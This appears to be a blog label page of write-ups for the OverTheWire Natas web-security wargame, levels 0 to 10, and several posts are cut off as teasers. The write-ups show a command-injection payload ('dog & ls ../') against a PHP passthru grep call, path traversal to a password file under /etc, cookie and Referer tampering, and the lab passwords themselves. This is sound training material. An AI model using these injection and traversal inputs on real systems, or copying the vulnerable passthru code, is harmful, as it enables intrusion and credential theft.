Showing posts with the label Natas

Over the wire Natas Level 10

Objective: Get password for Level 11

Solution:

So here we see an input box and a search button, but this time with this text:

    For security reasons, we now filter on certain characters

If we put in anything, it searches a dictionary.txt file for the input and displays the output. However, if we look in the source code, it looks like they are not going to let us use a lot of special characters this time:

    if($key != "") {
        if(preg_match('/[;|&]/',$key)) {
            print "Input contains an illegal character!";
        } else {
            passthru("grep -i $key dictionary.txt");
        }
    }
    ?>
    </pre>

Luckily for us, we don't need to use any of those special characters to get at the webpass directory using grep.

So, the grep man page (http://linuxcommand.org/lc3_man_pages/grep1.html):

    NAME
           grep, egrep, fgrep, rgrep - print lines matching a pattern
    SYNOPSIS
           grep [OP

Over the wire Natas Level 9

Objective: Get password for Level 10

Solution:

So here we see an input box and a search button. If we put in anything, it searches a dictionary.txt file for the input and displays the output.

Let's check out the source code for anything interesting.

    <pre>
    <?
    $key = "";
    if(array_key_exists("needle", $_REQUEST)) {
        $key = $_REQUEST["needle"];
    }
    if($key != "") {
        passthru("grep -i $key dictionary.txt");
    }
    ?>
    </pre>

OK, so it literally just greps the file for the keyword entered; the only check it does is to see if the key is empty. I bet we can pipe the input field to get it to return data.

Let's try an ls to see if we can pass directly to the shell like we think:

    dog & ls ../

Output:

    dictionary.txt
    ../:
    main
    natas0
    natas1
    natas10
    natas11
    natas12
    natas13
    natas14
    natas15
    natas16
    natas17
    natas18

Over the wire Natas Level 8

Objective: Get password for Level 9

Solution:

So here we get an input box that checks to see if it's the right key to get the correct password. We can see in the source code that the input we give is compared to a hardcoded string before it gives out the password:

    $encodedSecret = "3d3d516343746d4d6d6c315669563362";
    function encodeSecret($secret) {
        return bin2hex(strrev(base64_encode($secret)));
    }

So it takes our input, base64-encodes it, reverses the string, then converts it to hex. So theoretically, if we take the hardcoded secret and run it through that sequence backwards, we should have the value needed to match.

I wrote a little Python script to do the encoding for me:

    import base64
    string = '3d3d516343746d4d6d6c315669563362'
    print("The String is: ",string, "Length   is :", len(string))
    unhex = bytes.fromhex(string).decode('utf-8')
    print(&

Over the wire Natas Level 7

Objective: Get password for Level 8

Solution:

So this page is just two links, Home and About. If we click on one, we can see it's calling a PHP page to give us the page:

    http://natas7.natas.labs.overthewire.org/index.php?page=about

The source code for Home has this hint:

    <!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->

Looks like we are going to use path traversal to solve this one. If we put in natas8 for the page in the PHP, we get this error:

    http://natas7.natas.labs.overthewire.org/index.php?page=natas8

    Warning: include(natas8): failed to open stream: No such file or directory in /var/www/natas/natas7/index.php on line 21
    Warning: include(): Failed opening 'natas8' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/natas/natas7/index.php on line 21

Cool, let's try it with the full path:

    Page=/etc/natas_webpass/natas8
    http://natas7.natas.labs.

Over the wire Natas Level 6

Objective: Get password for Level 7

Solution:

So we have a text box with the label Input Secret and a Submit Query button. Let's check the source code again. Here it looks like the form is taking the password we provide and checking it against another password stored in a variable $_POST['secret']:

    <?
    include "includes/secret.inc";

    if(array_key_exists("submit", $_POST)) {
        if($secret == $_POST['secret']) {
            print "Access granted. The password for natas7 is <censored>";
        } else {
            print "Wrong secret";
        }
    }
    ?>

Let's see if we can just get to that file /includes/secret.inc and see if we can see the key in there:

    http://natas6.natas.labs.overthewire.org/includes/secret.inc

Looks like just a blank white page… but it did load, so the thing exists. Let's check the source for it:

    <?
    $secret =

Over the wire Natas Level 5

Objective: Get password for Level 6

Solution:

This page just shows a text box:

    Access disallowed. You are not logged in

So this is saying we aren't logged in. We just logged in, so there must be something else here that is tracking whether we are logged in or not.

Let's just take a look at the cookies using a cookie editor to see if there is something there that tracks if we are logged in or not.

Yup. In the cookie for this site we see a value named "Loggedin", and it is set to 0. Let's try flipping it to 1 and see what happens:

    Access granted. The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1

Over the wire Natas Level 4

Objective: Get password for Level 5

Solution:

This page just shows a text box:

    Access disallowed. You are visiting from "" while authorized users should come only from http://natas5.natas.labs.overthewire.org/

OK, so the message here is pointing us to the referring website. If we fire up Burp Suite and turn on intercept, we can see this:

    GET /index.php HTTP/1.1
    Host: natas4.natas.labs.overthewire.org
    User-Agent: Mozilla/5.0 (Linux; Android 7.0; PLUS Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.98 Mobile Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://natas4.natas.labs.overthewire.org/
    Cookie: __cfduid=dc1833b1d7b69b3cac3c87671133dc9051557462221; __utma=176859643.791061132.1557462220.1558030716.1570727565.8; __utmz=176859643.1557462220.1.1.utmcsr=(direct)|utmccn=

Over the wire Natas Level 3

Objective: Get password for Level 3

Solution:

This page just shows a text box:

    There is nothing on this page

Let's check the source code again:

    There is nothing on this page
    <!-- No more information leaks!! Not even Google will find it this time... -->
    </div>

Not even Google will find it this time, huh? What do we know that keeps web crawlers from indexing pages? Robots.txt.

Let's check out the robots.txt and see if there are any goodies in there:

    http://natas3.natas.labs.overthewire.org/robots.txt

    User-agent: *
    Disallow: /s3cr3t/

Disallow folder /s3cr3t/: it doesn't want Google to index that folder. Let's see what is in there:

    http://natas3.natas.labs.overthewire.org/s3cr3t/

Another users.txt file:

    http://natas3.natas.labs.overthewire.org/s3cr3t/users.txt

    natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ

Over the wire Natas Level 2

Objective: Get password for Level 3

Solution:

This page just shows a text box:

    There is nothing on this page

OK, let's check the source and see if there is anything interesting in there. In the HTML there is an img tag that links to a file named pixel.png in a folder named files:

    There is nothing on this page
    <img src="files/pixel.png">
    </div>
    </body></html>

Let's see if we can see what else is in that folder:

    http://natas2.natas.labs.overthewire.org/files/

There is a txt file in there named users.txt. Let's check it out:

    # username:password
    alice:BYNdCesZqW
    bob:jw2ueICLvT
    charlie:G5vCxkVV3m
    natas3:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14
    eve:zo4mJWyNj2
    mallory:9urtcpzBmH

natas3 password: sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14

Over the wire Natas Level 1

Objective: Get password for Level 2

Solution:

This page just shows a text box:

    You can find the password for the next level on this page, but rightclicking has been blocked!

No right-clicking… Okay, F11 in Chrome brings up the inspector, so let's use that to get the next password:

    <!--The password for natas2 is ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi -->

Over the wire Natas Level 0

Objective: Get password for Level 1

Solution:

This page just shows a text box:

    You can find the password for the next level on this page.

Checking the source code, we find the password for level 1:

    <!--The password for natas1 is gtVrDuiDfck831PqWsLEZy5gyDz1clto -->